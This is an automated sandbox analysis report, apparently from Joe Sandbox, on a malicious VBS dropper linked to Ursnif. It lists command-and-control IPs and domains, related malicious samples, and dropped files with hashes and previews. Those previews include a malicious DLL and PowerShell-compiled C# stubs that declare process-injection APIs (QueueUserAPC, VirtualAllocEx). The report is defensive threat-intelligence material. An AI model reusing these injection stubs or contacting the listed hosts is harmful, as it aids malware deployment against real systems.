                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target mshta.exe, PID 6556 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:56:22API Interceptor1x Sleep call for process: wscript.exe modified
                                09:57:01API Interceptor3x Sleep call for process: rundll32.exe modified
                                09:57:12API Interceptor44x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.251.90.253start[526268].vbsGet hashmaliciousBrowse
                                  URS8.VBSGet hashmaliciousBrowse
                                    documentation_446618.vbsGet hashmaliciousBrowse
                                      start_information[754877].vbsGet hashmaliciousBrowse
                                        start[873316].vbsGet hashmaliciousBrowse
                                          documentation[979729].vbsGet hashmaliciousBrowse
                                            run_documentation[820479].vbsGet hashmaliciousBrowse
                                              run[476167].vbsGet hashmaliciousBrowse
                                                run_presentation[645872].vbsGet hashmaliciousBrowse
                                                  documentation[979729].vbsGet hashmaliciousBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    resolver1.opendns.comstart[526268].vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    documentation_446618.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    nostalgia.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    ursi.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    OcEyzBswGm.exeGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Invoice778465.xlsbGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    ursnif.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    vntfeq.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    231231232.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    gbgr.dllGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    B9C23PuJnfNI.vbsGet hashmaliciousBrowse
                                                    • 208.67.222.222
                                                    art.microsoftsofymicrosoftsoft.atstart[526268].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    documentation_446618.vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    nostalgia.dllGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                    • 194.226.139.129
                                                    ursi.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                    • 193.187.173.154
                                                    Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Invoice778465.xlsbGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    9uHDrMnFYKhh.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    ursnif.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    8ph6zaHVzRpV.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    Cetu9U5nJ7Fc.vbsGet hashmaliciousBrowse
                                                    • 185.180.231.210
                                                    vntfeq.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    231231232.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    gbgr.dllGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    B9C23PuJnfNI.vbsGet hashmaliciousBrowse
                                                    • 95.181.163.74
                                                    payment_verification_99351.vbsGet hashmaliciousBrowse
                                                    • 95.181.163.74

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    SPRINTHOSTRUstart[526268].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    ZaRfpqeOYY.apkGet hashmaliciousBrowse
                                                    • 141.8.192.169
                                                    URS8.VBSGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    h4AjR43abb.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    documentation_446618.vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    start_information[754877].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    dAmDdz0YVv.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    start[873316].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    documentation[979729].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run_documentation[820479].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run[476167].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    run_presentation[645872].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    yXf9mhlpKV.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    mgdL2TD6Dg.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    documentation[979729].vbsGet hashmaliciousBrowse
                                                    • 185.251.90.253
                                                    Pi2KyLAg44.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    oClF50dZRG.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    2K5KXrsoLH.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    1fbm3cYMWh.exeGet hashmaliciousBrowse
                                                    • 185.251.88.208
                                                    SecuriteInfo.com.PyInstaller.29419.exeGet hashmaliciousBrowse
                                                    • 141.8.197.42

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Users\user\AppData\Local\Temp\fum.cppstart[526268].vbsGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11606
                                                      Entropy (8bit):4.883977562702998
                                                      Encrypted:false
                                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                      Malicious:false
                                                      Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1192
                                                      Entropy (8bit):5.325275554903011
                                                      Encrypted:false
                                                      SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
                                                      MD5:C85C42A32E22DE29393FCCCCF3BBA96E
                                                      SHA1:EAF3755C63061C96400536041D4F4EB8BC66E99E
                                                      SHA-256:9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
                                                      SHA-512:7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
                                                      Malicious:false
                                                      Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\RES36.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2184
                                                      Entropy (8bit):2.6945378022733095
                                                      Encrypted:false
                                                      SSDEEP:24:p6lalX0tlHMhKdNfI+ycuZhNzakS1PNnq9qpTMe9Ep:oG0tl+Kd91ulza3vq9j
                                                      MD5:67D9FD76B1560E756AD75887E896950E
                                                      SHA1:0A201C6BF0CDDBB1EEF5BB2F9946DF0C7F35BD81
                                                      SHA-256:15A6D69E837873D682E156749CA9950DEB0C2FAEDD4175C31477DF99A579CE18
                                                      SHA-512:53AD6E2F2B82E1AA7E47DA93965260A0BF38968FB9983D5B1479A85FD8B69479438BD8CA297C2421F9A0718499141112FC4494E09F389D8D91574496F63F1A42
                                                      Malicious:false
                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP.................;...i...._ ...........3.......C:\Users\user\AppData\Local\Temp\RES36.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\RESCC9.tmp
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2184
                                                      Entropy (8bit):2.705169992336164
                                                      Encrypted:false
                                                      SSDEEP:24:p6UKZHyhKdNNI+ycuZhNLakSdPNnq9qpjge9Ep:oUcoKd31ulLa3Hq93
                                                      MD5:AD4994FD8A9585256C18E9B844191482
                                                      SHA1:2EAB28A5E5342E81133D259DCEDC57FACA2D949F
                                                      SHA-256:AFC3875D94C4E29878351FB25DDA3B9A99D875390799A76A02757A3A03D3ABAB
                                                      SHA-512:EC164EAE0A976E9CDA5FBA6E19A0BE5B5D7BBD72BC5A2C4368D6443F6CDB9229A72763A86E9327D2F604A810D9EC8FB3E2D784E60C51B3B465FE518F382452B2
                                                      Malicious:false
                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP................/.uc...g...H.a..........4.......C:\Users\user\AppData\Local\Temp\RESCC9.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nmonbo0.fmq.ps1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erjsbakl.1hx.psm1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\adobe.url
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):108
                                                      Entropy (8bit):4.699454908123665
                                                      Encrypted:false
                                                      SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                      MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                      SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                      SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                      SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                      Malicious:false
                                                      Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                      C:\Users\user\AppData\Local\Temp\fum.cpp
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):387072
                                                      Entropy (8bit):6.617827225958404
                                                      Encrypted:false
                                                      SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                                      MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                                      SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                                      SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                                      SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                                      Malicious:true
                                                      Joe Sandbox View:
                                                      • Filename: start[526268].vbs, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.090185700011949
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryR3ak7YnqqAgPN5Dlq5J:+RI+ycuZhNzakS1PNnqX
                                                      MD5:EFE23BEC9FC9B5E06916A1BE875F2003
                                                      SHA1:AF5821C4AC138EB6603B162CC68A6B929E12AFAA
                                                      SHA-256:C507871D331678835BC859C11396AFD243A7794985E149FFC87E91788A3039B5
                                                      SHA-512:0FD67127250317FE9CBA42851AC9D2565CE3853106DA0AB9858CEFA613661B65673EDFA701C1BAFBDAD2AE7C43070BF52C5E782B23E672D59E8126DEAE0899C8
                                                      Malicious:false
                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.i.t.t.4.j.3.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.i.t.t.4.j.3.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.0.cs
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text
                                                      Category:dropped
                                                      Size (bytes):398
                                                      Entropy (8bit):4.993655904789625
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                      MD5:C08AF9BD048D4864677C506B609F368E
                                                      SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                      SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                      SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                      Malicious:false
                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):371
                                                      Entropy (8bit):5.205848361570366
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f9hPSjpS10zxs7+AEszI923f9hPSjpSP:p37Lvkmb6KzlIsqWZE2lIsP
                                                      MD5:9DFAD308AAA65D3C504CDF0B6F6C5A1A
                                                      SHA1:6E84AFA7A3652A64E3A5684011033FE3A45D28A5
                                                      SHA-256:EFA017E7C4068EC32A47BAA962BEAB8FA2E03ECEDE4644C05C676B913474EF3B
                                                      SHA-512:359A219143C27AED23CBEBB49C7573C94A61DC1E790AF87FFF00B77792A30744F926261EC60788E41F72958CB45F15AA0BED3EA6DA79C227C6F9FAED480F8192
                                                      Malicious:true
                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.0.cs"
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3584
                                                      Entropy (8bit):2.5809984345905286
                                                      Encrypted:false
                                                      SSDEEP:24:etGSVE/u2Dg85lxlok3Jgpi14MatkZfVNaUI+ycuZhNzakS1PNnq:6VtWb5lxF15JV11ulza3vq
                                                      MD5:DC9112D5FC4166AF941AC2400F1F2705
                                                      SHA1:A616BE6EE9692637A445D6AD46A5B6626DBC0C79
                                                      SHA-256:D3ACE842F1DB9073CE19ACCA01B55070664DF123D8EE965585D158533F665AA5
                                                      SHA-512:E0DF2FC3FF232BC2DC56BF58628A44D6856EEC709916AACF22BFDC5C3B2DFF46A8B110F12B3DFB7E5BA8C1D627832FC969992379254674E9AE6658ABF24D0A5E
                                                      Malicious:false
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.;a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.uitt4j30.dll.stkml.W32.mscorlib.Sy
                                                      C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.out
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):412
                                                      Entropy (8bit):4.871364761010112
                                                      Encrypted:false
                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                      Malicious:false
                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.108359816742105
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqIak7YnqqndPN5Dlq5J:+RI+ycuZhNLakSdPNnqX
                                                      MD5:7F2F1D7563A69C0467D006CA9148E761
                                                      SHA1:73836577FBECA2D4DA7D6893DAACB5D7E8E94853
                                                      SHA-256:1801E17613A44853806BA80C322FFE78AFEE0B38A28F3B5566DCA60AF92E46F9
                                                      SHA-512:14B7B229F51C302B9312E35EAE60B7C50B72AB5FC1A85D52732B96EEAD6C00923BED4C043DC53309710DD3F5CE9EF1FB67B504A88150B3BF1EC93FE8B0C15204
                                                      Malicious:false
                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.y.o.z.c.5.b.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.y.o.z.c.5.b.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text
                                                      Category:dropped
                                                      Size (bytes):421
                                                      Entropy (8bit):5.017019370437066
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                      MD5:7504862525C83E379C573A3C2BB810C6
                                                      SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                      SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                      SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                      Malicious:true
                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):371
                                                      Entropy (8bit):5.229827513162448
                                                      Encrypted:false
